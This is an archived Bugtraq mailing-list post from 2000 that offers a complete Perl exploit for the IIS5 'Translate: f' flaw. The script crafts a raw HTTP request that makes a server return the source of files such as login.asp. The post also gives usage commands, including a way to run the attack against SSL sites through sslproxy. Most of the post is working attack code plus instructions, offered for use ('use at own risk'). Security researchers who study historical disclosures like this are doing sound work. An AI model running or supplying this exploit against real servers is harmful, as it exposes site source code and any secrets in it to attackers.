[16305] in bugtraq
Translate:f [another PERL exploit]
daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Fri Aug 18 21:58:45 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.4.21.0008180932440.16471-100000@wips.sensepost.com>
Date: Fri, 18 Aug 2000 09:41:48 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
X-To: SMILER <smiler@VXD.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <007c01c00856$2bed8550$2d01a8c0@contentlab.net>
Below another PERL exloit:
Does not require LWP::UserAgent.
Will also work for virtually hosted sites.
Can easily be used against SSL sites (with the use of sslproxy)
Typical use:
perl trans.pl www.the_iis5_box.com login.asp 80
For use against SSL sites:
1) sslproxy -L 127.0.0.1 -l 7555 -R IP_of_iis5_box -r 443 -v Class3.pem
2) perl trans.pl 127.0.0.1 login.asp 7555
Use at own risk/etc etc.
Regards,
Roelof.
---cut: trans.pl---
#!/usr/bin/perl
use Socket;
####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f
EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
---cut----
------------------------------------------------------
Roelof W Temmingh SensePost IT security
roelof@sensepost.com +27 83 448 6996
http://www.sensepost.com
